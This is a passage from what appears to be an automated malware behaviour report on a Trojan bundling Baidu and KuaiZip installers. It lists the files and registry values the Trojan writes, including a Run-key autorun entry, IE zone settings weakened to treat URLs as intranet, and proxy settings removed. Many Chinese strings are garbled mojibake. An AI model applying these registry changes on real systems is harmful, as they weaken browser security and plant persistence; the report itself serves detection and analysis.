%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130929942969647500.dat (221 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db (145 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (0 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130929942969960000.dat (0 bytes)

The process KZMount.exe:3484 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\drivers\KuaiZipDrive.sys (601 bytes)

The process %original file name%.exe:1612 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\zy[1] (474165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\2k[1] (914718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\lggj1[1] (923075 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (628772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ky[1] (542053 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mm[1] (4394 bytes)

Registry activity

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1272 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"Policy" = "3"

[HKLM\SOFTWARE\Baidu\Baidu]
"TN" = "SE_Baiduclient_9vpgkwv8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¤Ã‚Â¸Ã‚Â»ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppPath" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦]
"UninstallString" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦]
"DisplayName" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦"

[HKLM\SOFTWARE\Baidu\Baidu]
"SupplyID" = "1050103060"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Baidu\Baidu\ConStatus]
"AutoRun" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Baidu\Baidu]
"BrowserSelected" = "2"

"INSTLANG" = "2052"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦]
"Publisher" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã…â€œÃ‚Â¨ÃƒÂ§Ã‚ÂºÃ‚Â¿ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ§Ã‚Â»Ã…â€œÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¦Ã…â€œÃ‚Â¯ÃƒÂ¯Ã‚Â¼Ã‹â€ ÃƒÂ¥Ã…â€™Ã¢â‚¬â€ÃƒÂ¤Ã‚ÂºÃ‚Â¬ÃƒÂ¯Ã‚Â¼Ã¢â‚¬Â°ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDir" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Baidu\Baidu]
"Version" = "1.6.200.359"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F9 37 EC 1D 98 2E 6E 14 83 0A 09 7D 67 5B 7E"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppName" = "Baidu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦]
"DisplayVersion" = "1.6.200.359"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDate" = "2015-11-26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Baidu\Baidu]
"channel" = "MainFrame=0,SearchBar=1,Tray=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦]
"DisplayIcon" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe,0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1216 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 52 73 5A 22 54 3E CC 19 F7 B1 36 69 EC B0 74"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduYouQian\packageinstall]
"param" = "Xxjh9G0tXMLez7O2T5upZbVkEFeGSirxy9dYQekwVzz3Z1ikJ jGDPSC0WRykW8aBmNrUQLi0OivztreQTX3edZTHioyulIhwOqiMyhdNK5MIUOU gYtMOfnR5maiaU9pCLak4mk2g7IGTEYLRGOkoo0QxbHsGj8Iv7jDuuJCgpSTL4Y2DQ0HuRIvWnwySHLybfpSRZkg29W8v/4oj0Bw2BJW6DWTg9VdBGmSEvZ1Ts8wvoZ41Dg nELDVclUFp2ihqcJPWYwTXJCCUc98tEqHuPf1CmzlAFFQaavUCwz/Geq45ALZiGAvlfHXZEJ5fQ50uD7lzwPCim6hqqGPp ra6HcmESFC6V1MGyIxU4kJzPtnT2xv67aOTXPT8nGfpbFBbAHxoLdmNabYU fdZPJ c U3HbzBeoa/rZaOe5jDaAjL/0aNFyDBXJ2CzcKU4/ChwztyhDz60ASl27b9lA6bS GzwRl6NcfIpxXM1u5a7sQsBQYxhwQJ6EkgMFnwwh"

The process Kuaizip_Setup_7654_1061607.exe:828 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"sfx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayIcon" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Uninst.exe"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹]
"ChannelID" = "7654_1061607"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"Mount.dll" = "0"

[HKCU\Software\SNDA]
"PCID" = "Jc4864ec2549537d77c8fc2ef6c089f348294df40032fdf4cae5e6c62db20ebba"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86\lang]
"Chs_Lang.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"readme.txt" = "0"
"x86" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KZMount.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"BSCoreNew.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayVersion" = "2.8.2.3"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"ÃƒÂ¥Ã‚Â¿Ã‚Â«ÃƒÂ¥Ã…Â½Ã¢â‚¬Â¹-ÃƒÂ¥Ã…Â½Ã¢â‚¬Â¹ÃƒÂ§Ã‚Â¼Ã‚Â©ÃƒÂ¥Ã¢â‚¬â„¢Ã…â€™ÃƒÂ¨Ã‚Â§Ã‚Â£ÃƒÂ¥Ã…Â½Ã¢â‚¬Â¹ÃƒÂ§Ã‚Â¼Ã‚Â©ÃƒÂ¥Ã‹â€ Ã‚Â©ÃƒÂ¥Ã¢â€žÂ¢Ã‚Â¨.URL" = "0"

"ali" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"Publisher" = "ÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ¦Ã‚ÂµÃ‚Â·ÃƒÂ¥Ã‚Â¹Ã‚Â¿ÃƒÂ¤Ã‚Â¹Ã‚ÂÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ§Ã‚Â»Ã…â€œÃƒÂ§Ã‚Â§Ã¢â‚¬ËœÃƒÂ¦Ã…Â Ã¢â€šÂ¬ÃƒÂ¦Ã…â€œÃ¢â‚¬Â°ÃƒÂ©Ã¢â€žÂ¢Ã‚ÂÃƒÂ¥Ã¢â‚¬Â¦Ã‚Â¬ÃƒÂ¥Ã‚ÂÃ‚Â¸"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"SendEverBox" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\.zip\ShellNew]
"FileName" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\zipnew.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayName" = "Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"DuiLib.dll" = "0"
"KuaiZip.exe" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\ali]
"kzshop.ico" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\KuaiZip\Install]
"InstallCount" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹]
"Version" = "2.8.2.3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\KuaiZip\Install]
"Path" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"lang" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"AppendMenu" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"data" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KZFormat.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"7zNew.dat" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"kuaizipUpdateChecker.dll" = "0"
"update.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 2C 17 5C 31 3B 6A 6F A2 43 4D 62 FE D8 A1 1F"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"SetupHelper.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86]
"KuaiZip.exe" = "KuaiZip Application"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\ali]
"jp.png" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"StoreOnly" = "*.MPEG *.MPG *.DAT *.avi *.mov *.asf *.3gp *.mkv *.flv *.ra *.rm *.ram *.aiff *.au *.midi *.vqf *.ogg *.mid *.aac *.ape"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"DiskOpt.exe" = "0"
"7z.dll" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"SLDefault.xml" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86]
"update.exe" = "update process"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"finderlib.dll" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86]
"KZMount.exe" = "KZMount"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹]
"Path" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"uninst.exe" = "0"

[HKCU\Software\KuaiZip\Install]
"InstallDate" = "151126"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Name" = "ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹ÃƒÆ’Ã¢â‚¬Â¹ÃƒÆ’Ã‚ÂµÃƒâ€šÃ‚Â²Ãƒâ€šÃ‚Â¢ÃƒÆ’Ã†â€™ÃƒÆ’Ã‚Â«Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«Ãƒâ€šÃ‚Â·ÃƒÆ’Ã¢â‚¬â€œÃƒÆ’Ã‚ÂÃƒÆ’Ã‚ÂÃƒâ€šÃ‚Â¸ÃƒÆ’Ã‚Â¸Ãƒâ€šÃ‚ÂºÃƒÆ’Ã†â€™ÃƒÆ’Ã¢â‚¬Å“ÃƒÆ’Ã¢â‚¬Ëœ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"UninstallString" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Uninst.exe"
"InstallDate" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"MountCore.dll" = "0"

[HKCR\.7z\ShellNew]
"FileName" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\7znew.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"LastUpdateDate" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"KzNew.dat" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"ExeImmi" = "1"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KZipShell.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KZReport.exe" = "0"

